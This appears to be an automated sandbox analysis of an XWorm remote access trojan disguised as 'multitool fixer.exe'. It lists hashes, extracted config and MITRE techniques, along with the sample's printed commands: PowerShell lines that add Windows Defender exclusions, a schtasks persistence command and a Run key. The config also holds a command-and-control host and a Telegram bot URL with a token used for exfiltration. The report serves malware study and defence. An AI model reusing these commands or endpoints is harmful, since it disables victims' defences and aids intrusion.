xworm | a66f7f3719c18785c8a658b1b0dde9348753ad8b07bb5407349cd87562806727

Analysis

max time kernel
839s
max time network
840s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21-01-2025 08:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

multitool fixer.exe
Size

69KB
MD5

c0822680b8bcf521199bd778a8ab8fb5
SHA1

a67e71b3fc5bf21f6ca7e00071c5228518a1efe4
SHA256

a66f7f3719c18785c8a658b1b0dde9348753ad8b07bb5407349cd87562806727
SHA512

c517f0cfb1596bf3a3fe6f0754f88f888d232fb3e1755cb0e712f65c90935cbde8fe1610fcf8db4de7f438108359470834cd679290217fb1447243f3732ba73b
SSDEEP

1536:fC0Ffd0Sz4p0+u0yveJm/H96Btbpru75jOzl6JiGcOz3VWFIcvkn+C:hj05lm/d6BtbprGIOz3VWFri+C

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

blood-pattern.gl.at.ply.gg:24558

Attributes

Install_directory
%AppData%
install_file
USB.exe
telegram
https://api.telegram.org/bot7704029346:AAHPre1lXQa0UfPCpOUXJZ9UXA9mFxvH4Gk/sendMessage?chat_id=7590668020

Signatures

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral1/memory/1696-1-0x00000000011B0000-0x00000000011C8000-memory.dmp	family_xworm
behavioral1/files/0x0004000000004ed7-31.dat	family_xworm
behavioral1/memory/1712-33-0x0000000000120000-0x0000000000138000-memory.dmp	family_xworm
behavioral1/memory/956-38-0x0000000001050000-0x0000000001068000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2668	powershell.exe
2316	powershell.exe
2640	powershell.exe
2176	powershell.exe

Deletes itself 1 IoCs

pid	Process
1496	cmd.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\security.lnk	multitool fixer.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\security.lnk	multitool fixer.exe

Executes dropped EXE 2 IoCs

pid	Process
1712	security
956	security

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\security = "C:\\Users\\Admin\\AppData\\Roaming\\security"	multitool fixer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
1280	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2700	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1696	multitool fixer.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2316	powershell.exe
2640	powershell.exe
2176	powershell.exe
2668	powershell.exe
1696	multitool fixer.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	1696	multitool fixer.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	1696	multitool fixer.exe
Token: SeDebugPrivilege	1712	security
Token: SeDebugPrivilege	956	security

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1696	multitool fixer.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 1696 wrote to memory of 2316	1696	multitool fixer.exe	31
PID 1696 wrote to memory of 2316	1696	multitool fixer.exe	31
PID 1696 wrote to memory of 2316	1696	multitool fixer.exe	31
PID 1696 wrote to memory of 2640	1696	multitool fixer.exe	33
PID 1696 wrote to memory of 2640	1696	multitool fixer.exe	33
PID 1696 wrote to memory of 2640	1696	multitool fixer.exe	33
PID 1696 wrote to memory of 2176	1696	multitool fixer.exe	35
PID 1696 wrote to memory of 2176	1696	multitool fixer.exe	35
PID 1696 wrote to memory of 2176	1696	multitool fixer.exe	35
PID 1696 wrote to memory of 2668	1696	multitool fixer.exe	37
PID 1696 wrote to memory of 2668	1696	multitool fixer.exe	37
PID 1696 wrote to memory of 2668	1696	multitool fixer.exe	37
PID 1696 wrote to memory of 2700	1696	multitool fixer.exe	39
PID 1696 wrote to memory of 2700	1696	multitool fixer.exe	39
PID 1696 wrote to memory of 2700	1696	multitool fixer.exe	39
PID 1664 wrote to memory of 1712	1664	taskeng.exe	43
PID 1664 wrote to memory of 1712	1664	taskeng.exe	43
PID 1664 wrote to memory of 1712	1664	taskeng.exe	43
PID 1664 wrote to memory of 956	1664	taskeng.exe	44
PID 1664 wrote to memory of 956	1664	taskeng.exe	44
PID 1664 wrote to memory of 956	1664	taskeng.exe	44
PID 1696 wrote to memory of 2976	1696	multitool fixer.exe	46
PID 1696 wrote to memory of 2976	1696	multitool fixer.exe	46
PID 1696 wrote to memory of 2976	1696	multitool fixer.exe	46
PID 1696 wrote to memory of 1496	1696	multitool fixer.exe	48
PID 1696 wrote to memory of 1496	1696	multitool fixer.exe	48
PID 1696 wrote to memory of 1496	1696	multitool fixer.exe	48
PID 1496 wrote to memory of 1280	1496	cmd.exe	50
PID 1496 wrote to memory of 1280	1496	cmd.exe	50
PID 1496 wrote to memory of 1280	1496	cmd.exe	50

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\multitool fixer.exe
"C:\Users\Admin\AppData\Local\Temp\multitool fixer.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\multitool fixer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'multitool fixer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\security'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'security'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2668
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "security" /tr "C:\Users\Admin\AppData\Roaming\security"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2700
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /delete /f /tn "security"
  2⤵
  PID:2976
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp7E25.tmp.bat""
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:1496
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:1280

C:\Windows\system32\taskeng.exe
taskeng.exe {0B8A27EA-3851-4299-9CB6-4B1F2FACB72B} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1664
- C:\Users\Admin\AppData\Roaming\security
  C:\Users\Admin\AppData\Roaming\security
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1712
- C:\Users\Admin\AppData\Roaming\security
  C:\Users\Admin\AppData\Roaming\security
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmp7E25.tmp.bat

Filesize
167B

MD5
e4398b976a168be69f17e405aaa643f6

SHA1
bf74cccd6992858e0e7c946a6e2f1aa50a659fc1

SHA256
95f43a746c209a25f6422ed7f87dff194d2f8674c2197576c82e8004bb834860

SHA512
5bcaf79529521d8ac0a7c7c03e9c0c2b5952ad8f3869ab539bbd483f7507ef35b9df7dd154aaa9f33ded1d5821f1e69e22c1be53135a669537291737e3c4c57c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
75f3a395de362bc09725fee9bf933a22

SHA1
ec6b4504caba4c3a2e93ce15ef150d7a523e3f21

SHA256
ec9eeb82b1c73f288cb51fffad831a7fef94f941bc1230a5c4d5cda5f8159fcd

SHA512
d39c56988c811cfae7d76c078cc7b375b0d2d70058cf528a0ed68f0c70b21ded9548ba55a8729948f36139c215f16e2a2a5138aa914344f7257411952231cb8d

Download Submit
C:\Users\Admin\AppData\Roaming\security

Filesize
69KB

MD5
c0822680b8bcf521199bd778a8ab8fb5

SHA1
a67e71b3fc5bf21f6ca7e00071c5228518a1efe4

SHA256
a66f7f3719c18785c8a658b1b0dde9348753ad8b07bb5407349cd87562806727

SHA512
c517f0cfb1596bf3a3fe6f0754f88f888d232fb3e1755cb0e712f65c90935cbde8fe1610fcf8db4de7f438108359470834cd679290217fb1447243f3732ba73b

Download Submit
memory/956-38-0x0000000001050000-0x0000000001068000-memory.dmp

Filesize
96KB

Download
memory/1696-1-0x00000000011B0000-0x00000000011C8000-memory.dmp

Filesize
96KB

Download
memory/1696-0-0x000007FEF56A3000-0x000007FEF56A4000-memory.dmp

Filesize
4KB

Download
memory/1696-35-0x000000001AAC0000-0x000000001AACC000-memory.dmp

Filesize
48KB

Download
memory/1696-34-0x000000001B1D0000-0x000000001B250000-memory.dmp

Filesize
512KB

Download
memory/1696-29-0x000000001B1D0000-0x000000001B250000-memory.dmp

Filesize
512KB

Download
memory/1712-33-0x0000000000120000-0x0000000000138000-memory.dmp

Filesize
96KB

Download
memory/2316-7-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/2316-8-0x0000000002770000-0x0000000002778000-memory.dmp

Filesize
32KB

Download
memory/2316-6-0x0000000002C50000-0x0000000002CD0000-memory.dmp

Filesize
512KB

Download
memory/2640-15-0x0000000001E60000-0x0000000001E68000-memory.dmp

Filesize
32KB

Download
memory/2640-14-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download